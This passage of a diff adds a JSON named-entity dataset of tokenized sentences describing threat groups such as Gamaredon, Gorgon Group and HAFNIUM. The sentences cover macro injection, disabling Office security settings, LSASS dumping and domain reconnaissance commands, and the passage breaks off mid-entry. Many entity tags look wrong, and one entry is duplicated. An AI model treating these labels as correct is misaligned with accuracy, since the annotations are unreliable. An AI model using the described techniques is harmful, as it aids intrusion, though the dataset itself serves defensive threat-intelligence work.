"O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "<code>hidcon</code>", + "to", + "run", + "batch", + "files", + "in", + "a", + "hidden", + "console", + "window." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "downloaded", + "additional", + "malware", + "and", + "tools", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "left", + "taunting", + "images", + "and", + "messages", + "on", + "the", + "victims'", + "desktops", + "as", + "proof", + "of", + "system", + "access." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "an", + "Outlook", + "VBA", + "module", + "on", + "infected", + "systems", + "to", + "send", + "phishing", + "emails", + "with", + "malicious", + "attachments", + "to", + "other", + "employees", + "within", + "the", + "organization." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "tested", + "connectivity", + "between", + "a", + "compromised", + "machine", + "and", + "a", + "C2", + "server", + "using", + "Ping", + "with", + "commands", + "such", + "as", + "`CSIDL_SYSTEM\\cmd.exe", + "/c", + "ping", + "-n", + "1`." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "attempted", + "to", + "get", + "users", + "to", + "click", + "on", + "Office", + "attachments", + "with", + "malicious", + "macros", + "embedded." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "legitimate", + "process", + "names", + "to", + "hide", + "malware", + "including", + "<code>svchosst</code>." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "removed", + "security", + "settings", + "for", + "VBA", + "macro", + "execution", + "by", + "changing", + "registry", + "values", + "<code>HKCU\\Software\\Microsoft\\Office\\<version>\\<product>\\Security\\VBAWarnings</code>", + "and", + "<code>HKCU\\Software\\Microsoft\\Office\\<version>\\<product>\\Security\\AccessVBOM</code>." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "`mshta.exe`", + "to", + "execute", + "malicious", + "HTA", + "files." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "malware", + "has", + "used", + "<code>CreateProcess</code>", + "to", + "launch", + "additional", + "malicious", + "components." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "delivered", + "self-extracting", + "7z", + "archive", + "files", + "within", + "malicious", + "document", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "inserted", + "malicious", + "macros", + "into", + "existing", + "documents,", + "providing", + "persistence", + "when", + "they", + "are", + "reopened.", + "Gamaredon", + "Group", + "has", + "loaded", + "the", + "group's", + "previously", + "delivered", + "VBA", + "project", + "by", + "relaunching", + "Microsoft", + "Outlook", + "with", + "the", + "<code>/altvba</code>", + "option,", + "once", + "the", + "Application.Startup", + "event", + "is", + "received." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "tools", + "have", + "contained", + "an", + "application", + "to", + "check", + "performance", + "of", + "USB", + "flash", + "drives.", + "Gamaredon", + "Group", + "has", + "also", + "used", + "malware", + "to", + "scan", + "for", + "removable", + "drives." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "obfuscated", + "PowerShell", + "scripts", + "for", + "staging." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "tools", + "to", + "enumerate", + "processes", + "on", + "target", + "hosts", + "including", + "Process", + "Explorer." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "tools", + "have", + "registered", + "Run", + "keys", + "in", + "the", + "registry", + "to", + "give", + "malicious", + "VBS", + "files", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "malware", + "has", + "used", + "rundll32", + "to", + "launch", + "additional", + "malicious", + "components." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "created", + "scheduled", + "tasks", + "to", + "launch", + "executables", + "after", + "a", + "designated", + "number", + "of", + "minutes", + "have", + "passed." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group's", + "malware", + "can", + "take", + "screenshots", + "of", + "the", + "compromised", + "computer", + "every", + "minute." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "delivered", + "spearphishing", + "emails", + "with", + "malicious", + "attachments", + "to", + "targets." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Gamaredon", + "Group", + "file", + "stealer", + "can", + "gather", + "the", + "victim's", + "computer", + "name", + "and", + "drive", + "serial", + "numbers", + "to", + "send", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "Gamaredon", + "Group", + "file", + "stealer", + "can", + "gather", + "the", + "victim's", + "username", + "to", + "send", + "to", + "a", + "C2", + "server." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "injected", + "malicious", + "macros", + "into", + "all", + "Word", + "and", + "Excel", + "documents", + "on", + "mapped", + "network", + "drives." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "B-Purp", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "DOCX", + "files", + "to", + "download", + "malicious", + "DOT", + "document", + "templates", + "and", + "has", + "used", + "RTF", + "template", + "injection", + "to", + "download", + "malicious", + "payloads.", + "Gamaredon", + "Group", + "can", + "also", + "inject", + "malicious", + "macros", + "or", + "remote", + "templates", + "into", + "documents", + "already", + "present", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "registered", + "domains", + "to", + "stage", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "VNC", + "tools,", + "including", + "UltraVNC,", + "to", + "remotely", + "interact", + "with", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "embedded", + "malicious", + "macros", + "in", + "document", + "templates,", + "which", + "executed", + "VBScript.", + "Gamaredon", + "Group", + "has", + "also", + "delivered", + "Microsoft", + "Outlook", + "VBA", + "projects", + "with", + "embedded", + "macros." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "HTTP", + "and", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "GitHub", + "repositories", + "for", + "downloaders", + "which", + "will", + "be", + "obtained", + "by", + "the", + "group's", + ".NET", + "executable", + "on", + "the", + "compromised", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "various", + "batch", + "scripts", + "to", + "establish", + "C2", + "and", + "download", + "additional", + "files.", + "Gamaredon", + "Group's", + "backdoor", + "malware", + "has", + "also", + "been", + "written", + "to", + "a", + "batch", + "file." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gamaredon", + "Group", + "has", + "used", + "WMI", + "to", + "execute", + "scripts", + "used", + "for", + "discovery." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "malware", + "can", + "decode", + "contents", + "from", + "a", + "payload", + "that", + "was", + "Base64", + "encoded", + "and", + "write", + "the", + "contents", + "to", + "a", + "file." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "malware", + "can", + "attempt", + "to", + "disable", + "security", + "features", + "in", + "Microsoft", + "Office", + "and", + "Windows", + "Defender", + "using", + "the", + "<code>taskkill</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "has", + "used", + "<code>-W", + "Hidden</code>", + "to", + "conceal", + "PowerShell", + "windows", + "by", + "setting", + "the", + "WindowStyle", + "parameter", + "to", + "hidden." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "malware", + "can", + "download", + "additional", + "files", + "from", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "attempted", + "to", + "get", + "users", + "to", + "launch", + "malicious", + "Microsoft", + "Office", + "attachments", + "delivered", + "via", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "malware", + "can", + "deactivate", + "security", + "mechanisms", + "in", + "Microsoft", + "Office", + "by", + "editing", + "several", + "keys", + "and", + "values", + "under", + "<code>HKCU\\Software\\Microsoft\\Office\\</code>." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "malware", + "can", + "leverage", + "the", + "Windows", + "API", + "call,", + "CreateProcessA(),", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "malware", + "can", + "download", + "a", + "remote", + "access", + "tool,", + "ShiftyBug,", + "and", + "inject", + "into", + "another", + "process." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-Tool", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "malware", + "can", + "use", + "PowerShell", + "commands", + "to", + "download", + "and", + "execute", + "a", + "payload", + "and", + "open", + "a", + "decoy", + "document", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "malware", + "can", + "use", + "process", + "hollowing", + "to", + "inject", + "one", + "of", + "its", + "trojans", + "into", + "another", + "process." + ], + "ner_tags": [ + "B-Idus", + "I-HackOrg", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "malware", + "can", + "create", + "a", + ".lnk", + "file", + "and", + "add", + "a", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-Tool", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "malware", + "can", + "create", + "a", + ".lnk", + "file", + "and", + "add", + "a", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-Tool", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "sent", + "emails", + "to", + "victims", + "with", + "malicious", + "Microsoft", + "Office", + "documents", + "attached." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "QuasarRAT", + "and", + "Remcos." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "has", + "used", + "macros", + "in", + "Spearphishing", + "Attachments", + "as", + "well", + "as", + "executed", + "VBScripts", + "on", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Gorgon", + "Group", + "malware", + "can", + "use", + "cmd.exe", + "to", + "download", + "and", + "execute", + "payloads", + "and", + "to", + "execute", + "commands", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Group5", + "disguised", + "its", + "malicious", + "binaries", + "with", + "several", + "layers", + "of", + "obfuscation,", + "including", + "encrypting", + "the", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Malware", + "used", + "by", + "Group5", + "is", + "capable", + "of", + "remotely", + "deleting", + "files", + "from", + "victims." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Malware", + "used", + "by", + "Group5", + "is", + "capable", + "of", + "capturing", + "keystrokes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Malware", + "used", + "by", + "Group5", + "is", + "capable", + "of", + "watching", + "the", + "victim's", + "screen." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "granted", + "privileges", + "to", + "domain", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "used", + "7-Zip", + "and", + "WinRAR", + "to", + "compress", + "stolen", + "files", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "interacted", + "with", + "Office", + "365", + "tenants", + "to", + "gather", + "details", + "regarding", + "target's", + "environments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Org", + "I-Org", + "I-Org", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "collected", + "data", + "and", + "files", + "from", + "a", + "compromised", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "created", + "domain", + "accounts." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "collected", + "e-mail", + "addresses", + "for", + "users", + "they", + "intended", + "to", + "target." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "exfiltrated", + "data", + "to", + "file", + "sharing", + "sites,", + "including", + "MEGA." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "exploited", + "CVE-2021-44228", + "in", + "Log4j", + "and", + "CVE-2021-26855,", + "CVE-2021-26857,", + "CVE-2021-26858,", + "and", + "CVE-2021-27065", + "to", + "compromise", + "on-premises", + "versions", + "of", + "Microsoft", + "Exchange", + "Server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "searched", + "file", + "contents", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "gathered", + "the", + "fully", + "qualified", + "domain", + "names", + "(FQDNs)", + "for", + "targeted", + "Exchange", + "servers", + "in", + "the", + "victim's", + "environment." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "hidden", + "files", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "obtained", + "IP", + "addresses", + "for", + "publicly-accessible", + "Exchange", + "servers." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "downloaded", + "malware", + "and", + "tools--including", + "Nishang", + "and", + "PowerCat--onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "checked", + "for", + "network", + "connectivity", + "from", + "a", + "compromised", + "host", + "using", + "`ping`,", + "including", + "attempts", + "to", + "contact", + "`google[.]com`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "used", + "<code>procdump</code>", + "to", + "dump", + "the", + "LSASS", + "process", + "memory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "used", + "the", + "NT", + "AUTHORITY\\SYSTEM", + "account", + "to", + "create", + "files", + "on", + "Exchange", + "servers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "stolen", + "copies", + "of", + "the", + "Active", + "Directory", + "database", + "(NTDS.DIT)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "used", + "TCP", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "used", + "the", + "Exchange", + "Power", + "Shell", + "module", + "<code>Set-OabVirtualDirectoryPowerShell</code>", + "to", + "export", + "mailbox", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "used", + "`tasklist`", + "to", + "enumerate", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "used", + "web", + "shells", + "to", + "export", + "mailbox", + "data." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "enumerated", + "domain", + "controllers", + "using", + "`net", + "group", + "\"Domain", + "computers\"`", + "and", + "`nltest", + "/dclist`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "used", + "<code>rundll32</code>", + "to", + "load", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "used", + "ASCII", + "encoding", + "for", + "C2", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "collected", + "IP", + "information", + "via", + "IPInfo." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "used", + "`whoami`", + "to", + "gather", + "user", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "operated", + "from", + "leased", + "virtual", + "private", + "servers", + "(VPS)", + "in", + "the", + "United", + "States." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-Area", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "used", + "open-source", + "C2", + "frameworks,", + "including", + "Covenant." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "acquired", + "web", + "services", + "for", + "use", + "in", + "C2", + "and", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "deployed", + "multiple", + "web", + "shells", + "on", + "compromised", + "servers", + "including", + "SIMPLESEESHARP,", + "SPORTSBALL,", + "China", + "Chopper,", + "and", + "ASPXSpy." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "I-Tool", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "HAFNIUM", + "has", + "used", + "`cmd.exe`", + "to", + "execute", + "commands", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "a", + "PowerShell-based", + "keylogging", + "tool", + "to", + "capture", + "the", + "window", + "title." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "cloud", + "services,", + "including", + "OneDrive,", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "HEXANE", + "has", + "used", + "brute", + "force", + "attacks", + "to", + "compromise", + "valid", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Org", + "I-OffAct", + "I-OffAct", + "O", + 